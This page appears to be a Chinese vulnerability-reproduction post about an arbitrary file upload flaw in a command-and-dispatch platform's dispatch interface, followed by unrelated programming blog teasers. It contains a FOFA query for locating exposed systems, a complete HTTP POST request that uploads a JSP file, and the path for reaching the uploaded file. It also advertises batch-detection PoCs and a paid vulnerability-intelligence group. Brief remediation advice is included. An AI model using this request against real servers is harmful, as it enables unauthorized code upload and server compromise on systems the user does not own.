当前位置：首页 > news >正文

【漏洞复现】可视化融合指挥调度平台 dispatch接口处存在任意文件上传漏洞

news 2025/7/4 22:04:36

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

可视化融合指挥调度平台 dispatch接口处存在任意文件上传漏洞，恶意攻击者可以上传恶意软件，例如后门、木马或勒索软件，以获取对服务器的远程访问权限或者破坏系统，对服务器造成极大的安全隐患。

Ⅱ、fofa语句

body="/favicon.ico#/login"

Ⅲ、漏洞复现

POC

POST /dispatch/layuiIm/uploadFile HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----HJBFIUERGBFUYERBVYUBBhbvuyvvtyckuhij
Content-Length: 151------HJBFIUERGBFUYERBVYUBBhbvuyvvtyckuhij
Content-Disposition: form-data; name="file";filename="ceshi.jsp"<% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
------HJBFIUERGBFUYERBVYUBBhbvuyvvtyckuhij--

1、发送数据包,上传文件

2、访问上传文件

https://127.0.0.1/media/other/2024/4/7/1712471425959.jsp

Ⅳ、Nuclei-POC

Ⅴ、修复建议

1、限制访问来源地址，如非必要，不要将系统开放在互联网上；

2、文件类型白名单：仅允许上传预先批准的文件类型，并拒绝所有其他文件；

3、定期安全更新：及时应用安全更新和补丁，以修复任何已发现的漏洞。

漏洞批量检测POC请前往公众号后台回复"20240407"获取

圈子名称：ONEPIECE

限时优惠券：入圈立减20

圈子福利：每天更新最新漏洞情报1~2篇不等，不定时发放现金红包10-30元不等。

立减20

交流群

【漏洞复现】可视化融合指挥调度平台 dispatch接口处存在任意文件上传漏洞

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该…...

编程日记 2024/4/7 19:50:57

最讨厌这种字符串问题了！！

题目：洛谷P1957口算练习题题目大意描述： 第一行输入一个整数表示接下来要进行多少次运算，接下来每行输入一个字母c和两个数字x,y（输入的字母为a/b/c,分别表示要进行，-，*运算）或者就输入两个数…...

编程日记 2024/4/7 19:49:55

B-名牌赌王（本人遇到的题，做个笔记）

题解： #include <iostream> #include <queue> //需要用小根堆的优先队列 #include <unordered_map> //用无序映射 using namespace std; bool pai() {int n, m;cin >> n >> m; priority_queue<int, vector<int>, gr…...

编程日记 2024/4/7 19:47:53

博客评论回复03

接着之前写的，之前返回的数据集按道理来说渲染出来还是丑丑的，因此这次我看着抖音的评论样子，自己瞎写了一通，不过也算是模仿出来了虽然肯定没有抖音写的好。类似与前面几章写的表结构首先看看抖音评论区是怎么样的&#xff1f…...

编程日记 2024/4/7 19:44:47

【【萌新的学习之Numpy数组的使用】】

萌新的学习之Numpy数组的使用先记录一下之前的关于函数的设计通过创造类的形式复习完毕之后介绍numpy数组的使用 #整数型数组遇到除法 （即便是除以整数） 不同维度的数组之间从外形上的本质区别一维数组用1层中括号二维数组用2层中括号三维数…...

编程日记 2024/4/7 19:39:40

RabbitMQ3.13.x之七_RabbitMQ消息队列模型

RabbitMQ3.13.x之七_RabbitMQ消息队列模型文章目录 RabbitMQ3.13.x之七_RabbitMQ消息队列模型1. RabbitMQ消息队列模型1. 简单队列2. Work Queues(工作队列)3. Publish/Subscribe(发布/订阅)4. Routing(路由)5. Topics(主题)6. RPC(远程过程调用)7. Publisher Confirms(发布者…...

编程日记 2024/4/7 19:38:38

Android JNI 调用第三方SO

最近一个项目使用了Go 编译了一个so库，但是这个so里面还需要使用第三方so库pdfium, 首先在Android工程把2个so库都放好在jni中只能使用dlopen方式，其他的使用函数指针的方式来调用，和windows dll类似，不然虽然编译过了但是会崩溃…...

编程日记 2024/4/7 19:37:36

Vid2seq

Vid2Seq 应该是目前为止，个人最中意得一篇能够实际解决对一段视频进行粗略理解得paper了。个人认为它能够真正能解决视频理解是因为它是对一个模型整体做了训练，而不仅仅是通过visual encoders（e.g BLIP/CLIP/…）和其它multi modal 的encoder直接过了个projection，做一个…...

编程日记 2024/4/7 19:36:34

Opencv人机交互界面设置

Opencv人机交互界面设置以下是一些常见的OpenCV人机交互界面设置： 窗口交互显示窗口：可以使用cv2.imshow()函数在屏幕上显示图像。例如，要显示名为“image”的图像，可以使用以下代码： import cv2img cv2.imread…...

编程日记 2024/4/7 19:33:29

蓝桥杯算法心得——字典树考试（贡献度+前缀和）

大家好，我是晴天学长，贡献度的题，找到技巧非常重要，需要的小伙伴可以关注支持一下哦！后续会继续更新的。💪💪💪 1) .字典树考试字典树考试问题描述蓝桥学院最近教学了字典树这一数…...

编程日记 2024/4/7 19:28:24

Linux下Qt生成程序崩溃文件

文章目录 1.背景2.Qt编译生成程序2.1.profile模式的本质 3.执行程序，得到core文件4.代码定位4.1.直接使用gdb4.2.使用QtCreator 5.总结6.题外话6.1.profile模式和debug模式的区别 1.背景在使用Qt时，假如在windows，当软件崩溃时，…...

编程日记 2024/4/7 19:27:22

Go语言中测试和性能

1. 测试：软件开发最重要的方面测试软件程序可能是软件开发人员能够做的最重要的事情。通过测试代码的功能，开发人员能够在很大程度上确定程序是有效的。另外，每次修改代码后，开发人员都可运行测试，确认没有引入Bug和衰退。通过测试软件，还能够让软件工程师确认程序按期望…...

编程日记 2024/4/7 19:24:20

回归预测 | Matlab基于CPO-GPR基于冠豪猪算法优化高斯过程回归的多输入单输出回归预测

回归预测 | Matlab基于CPO-GPR基于冠豪猪算法优化高斯过程回归的多输入单输出回归预测目录回归预测 | Matlab基于CPO-GPR基于冠豪猪算法优化高斯过程回归的多输入单输出回归预测预测效果基本介绍程序设计参考资料预测效果基本介绍 Matlab基于CPO-GPR基于冠豪猪算法优化高斯…...

编程日记 2024/4/7 19:22:17

python 日期字符串转换为指定格式的日期

在Python编程中，日期处理是一个常见的任务。我们经常需要将日期字符串转换为Python的日期对象，以便进行日期的计算、比较或其他操作。同时，为了满足不同的需求，我们还需要将日期对象转换为指定格式的日期字符串。本文将详细介绍如…...

编程日记 2024/4/7 19:17:13

day03-Docker

1.初识 Docker 1.1.什么是 Docker 1.1.1.应用部署的环境问题大型项目组件较多，运行环境也较为复杂，部署时会碰到一些问题： 依赖关系复杂，容易出现兼容性问题开发、测试、生产环境有差异例如一个项目中，部署时需要依…...

编程日记 2024/4/7 19:11:08

C语言函数实现冒泡排序

前言今天我们来看看怎么使用函数的方式实现冒泡排序吧，我们以一个数组为例arr[] {9,8,7,6,5,4,3,2,1,0},我们将这个数组通过冒泡排序的方式让他变为升序吧。代码实现 #include<stdio.h> void bubble_sort(int arr[], int sz) {int i 0;for (i 0;i < s…...

编程日记 2024/4/7 19:10:05

区间概率预测python|QR-CNN-BiLSTM+KDE分位数-卷积-双向长短期记忆神经网络-时间序列区间概率预测+核密度估计

区间预测python|QR-CNN-BiLSTMKDE分位数-卷积-双向长短期记忆神经网络-核密度估计-回归时间序列区间预测模型输出展示： (图中是只设置了20次迭代的预测结果，宽度较宽，可自行修改迭代参数，获取更窄的预测区间） 注&am…...

编程日记 2024/4/7 19:02:57

Java 分支结构 - if…else/switch

顺序结构只能顺序执行，不能进行判断和选择，因此需要分支结构。 Java有两种分支结构： if语句switch语句 if语句一个if语句包含一个布尔表达式和一条或多条语句。语法 If 语句的用语法如下： if(布尔表达式) {//如果布尔表达…...

编程日记 2024/4/7 19:00:55

【Unity每日一记】如何从0到1将特效图集制作成一个特效

👨‍💻个人主页：元宇宙-秩沅 👨‍💻 hallo 欢迎点赞👍 收藏⭐ 留言📝 加关注✅! 👨‍💻 本文由秩沅原创 👨‍💻 收录于专栏：Uni…...

编程日记 2024/4/7 18:59:54

磁力链接的示例与解释

磁力链接（Magnet URI scheme）是一种特殊类型的统一资源标识符（URI），它包含了通过特定散列函数（如SHA-1）得到的文件内容的散列值，而不是基于位置或名称的引用。这使得磁力链接成为在分…...

编程日记 2024/4/7 18:58:53

日语AI面试高效通关秘籍：专业解读与青柚面试智能助攻

在如今就业市场竞争日益激烈的背景下，越来越多的求职者将目光投向了日本及中日双语岗位。但是，一场日语面试往往让许多人感到步履维艰。你是否也曾因为面试官抛出的“刁钻问题”而心生畏惧？面对生疏的日语交流环境，即便提前恶补了…...

编程新知 2025/7/4 20:05:03

微信小程序之bind和catch

这两个呢，都是绑定事件用的，具体使用有些小区别。官方文档： 事件冒泡处理不同 bind：绑定的事件会向上冒泡，即触发当前组件的事件后，还会继续触发父组件的相同事件。例如，有一个子视图绑定了b…...

编程新知 2025/7/1 19:17:22

练习（含atoi的模拟实现,自定义类型等练习）

一、结构体大小的计算及位段 （结构体大小计算及位段详解请看：自定义类型：结构体进阶-CSDN博客） 1.在32位系统环境，编译选项为4字节对齐，那么sizeof(A)和sizeof(B)是多少？ #pragma pack(4)st…...

编程新知 2025/7/4 12:18:00

Vue3 + Element Plus + TypeScript中el-transfer穿梭框组件使用详解及示例

使用详解 Element Plus 的 el-transfer 组件是一个强大的穿梭框组件，常用于在两个集合之间进行数据转移，如权限分配、数据选择等场景。下面我将详细介绍其用法并提供一个完整示例。核心特性与用法基本属性 v-model：绑定右侧列表的值&…...

编程新知 2025/7/1 12:07:59

条件运算符

C中的三目运算符（也称条件运算符，英文：ternary operator）是一种简洁的条件选择语句，语法如下： 条件表达式 ? 表达式1 : 表达式2• 如果“条件表达式”为true，则整个表达式的结果为“表达式1”…...

编程新知 2025/7/4 8:51:43

376. Wiggle Subsequence

376. Wiggle Subsequence 代码 class Solution { public:int wiggleMaxLength(vector<int>& nums) {int n nums.size();int res 1;int prediff 0;int curdiff 0;for(int i 0;i < n-1;i){curdiff nums[i1] - nums[i];if( (prediff > 0 && curdif…...

编程新知 2025/7/4 13:23:30